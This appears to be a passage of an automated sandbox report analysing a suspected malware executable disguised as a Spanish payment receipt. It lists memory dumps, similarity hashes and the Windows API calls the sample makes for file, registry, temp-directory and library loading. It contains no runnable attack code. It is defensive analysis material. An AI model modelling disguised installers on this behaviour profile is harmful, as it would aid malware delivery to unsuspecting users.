• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: CloseCreateHandleProcess
• String ID:
• API String ID: 3712363035-0
• Opcode ID: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
• Instruction ID: 90cc6d476167cb297d6b140a5f1e3d8b94c2ff7c6bb70ea469832da4d223c92c
• Opcode Fuzzy Hash: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
• Instruction Fuzzy Hash: F2E0BFB46002097FEB109B64ED45F7B77BCEB04608F414465BD54F6150DB74A9158E7C
APIs
• GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
• GetProcAddress.KERNEL32(00000000,?), ref: 00406901
  • Part of subcall function 00406864: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
  • Part of subcall function 00406864: wsprintfW.USER32 ref: 004068B6
  • Part of subcall function 00406864: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004068CA
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
• String ID:
• API String ID: 2547128583-0
• Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
• Instruction ID: b54d22b37b479e59566a9631c032e51b8c6cd741f5ea0e4d018af200ac078f8b
• Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
• Instruction Fuzzy Hash: 48E086335042109AE21197715D44C7B73A8AF89650307443EF947F2080DB38DC31A669
APIs
• GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\Justificante pago-09453256434687.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
• CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
• Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
• Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
• Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
• Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
APIs
• GetFileAttributesW.KERNELBASE(?,?,00405BD7,?,?,00000000,00405DAD,?,?,?,?), ref: 00405FD7
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00405FEB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                    • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                                    • Instruction ID: 846b50f6ec280e5947384c74444241e6b9796591039fc91e932c01759f2cc32f
                                                                                                                                                                                    • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2CD0C972504531ABC2102728EE0889BBB55EF642717054A35FAA5A22B0CB304C529E98
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00405AC9
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1375471231-0
                                                                                                                                                                                    • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                                    • Instruction ID: 81e7360d8487983dd45b28c0c59a41c1d83062ba9acea414cf4290cf05fa9266
                                                                                                                                                                                    • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                                    • Instruction Fuzzy Hash: C3C04C30314601AED7505B609E48B177EA19B94741F1A85396146E41A4DA389455DD2D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfileStringWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 390214022-0
                                                                                                                                                                                    • Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                                                                                                                    • Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                                                                                                                    • Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 004063CB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Create
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                                                                    • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                                                                                                                    • Instruction ID: 33fcb2899acb2d8a51dea3519172d90e3aaf79576ce2bf617fe5633813c3fc69
                                                                                                                                                                                    • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 40E0BF72010109BEDF195F50ED0AD7B3A1DE704300F01452EB906D4051E6B5A9306664
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034AC,00000000,00000000,00403303,000000FF,00000004,00000000,00000000,00000000), ref: 0040608E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
• Instruction ID: c8e4d841af9964a9af1d27d101842a5e1860e0780d1899a5c61b78fe641b59a9
• Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
• Instruction Fuzzy Hash: 84E08632140219ABCF10EE518C00EEB379CFF01390F054432F911E2140D638E92187A4
APIs
• WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347A,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060BD
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
• Instruction ID: 36c6d552b97af02dd58307b05a598db1695570393df740455f8c701413f3969e
• Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
• Instruction Fuzzy Hash: AFE0E632150169ABDF10DE559C00EEB775CEB05351F014476F955E3150DA31E87197A5
APIs
• RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406402,?,00000000,?,?,: Completed,?), ref: 00406398
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
• Instruction ID: 95f024e915835d806257714b27b18acfdec26fcf9bd71fa5ecdde53cd8054228
• Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
• Instruction Fuzzy Hash: 00D0123210030DBBDF11AF90DD01FAB3B1DAB08310F014436FE06A5091D776D530AB64
APIs
• SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 9ed813dc5e0ae011bbb39e354fb2185b2751a29f1249f91cdd763d9aa28b90ef
• Instruction ID: dab120aab1e819a0f3e7a590800bcc330433e48d8fa1e5c71f26214da8b737bd
• Opcode Fuzzy Hash: 9ed813dc5e0ae011bbb39e354fb2185b2751a29f1249f91cdd763d9aa28b90ef
• Instruction Fuzzy Hash: B4D01272B08110DBDB11DBA8AA48B9D72A4AB50364B208537D111F61D0E6B9C5559619
APIs
  • Part of subcall function 00406544: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
  • Part of subcall function 00406544: lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
• SetDlgItemTextW.USER32(?,?,00000000), ref: 0040447D
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: ItemTextlstrcatlstrlen
• String ID:
• API String ID: 281422827-0
• Opcode ID: 26cd6fd2a30a9edae1afc01185c8e6693b4f27573a3b41b2952906fd053f54dd
• Instruction ID: a894ff31b73895be19cc099c8c24ae83fb845b4aca8af963ae3db1ea54c4578e
• Opcode Fuzzy Hash: 26cd6fd2a30a9edae1afc01185c8e6693b4f27573a3b41b2952906fd053f54dd
• Instruction Fuzzy Hash: F6C08C31048200BFD281A704CC42F1FF3E8EF9031AF00C42EB15CE00D1C63494208A26
APIs
• SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
• Instruction ID: 22c14ff0de7d99e8655fd7423acc63eaa31bea8074cc9abcc6b2c74ee929f0f7
• Opcode Fuzzy Hash: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
• Instruction Fuzzy Hash: 54C09B71740706BBEE608F519D49F1777586750700F298579B755F60D0C674E410DA1C
APIs
• SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                    • Opcode ID: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
                                                                                                                                                                                    • Instruction ID: a70792fcf8e9dbddb4bc54a752e2f47ec30058e0f009e109d264f56951a5bac9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 28B09236281A00EBDE614B00EE09F457A62A768701F008468B641240B0CAB240A5DB19
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,00403847,?), ref: 004034BD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
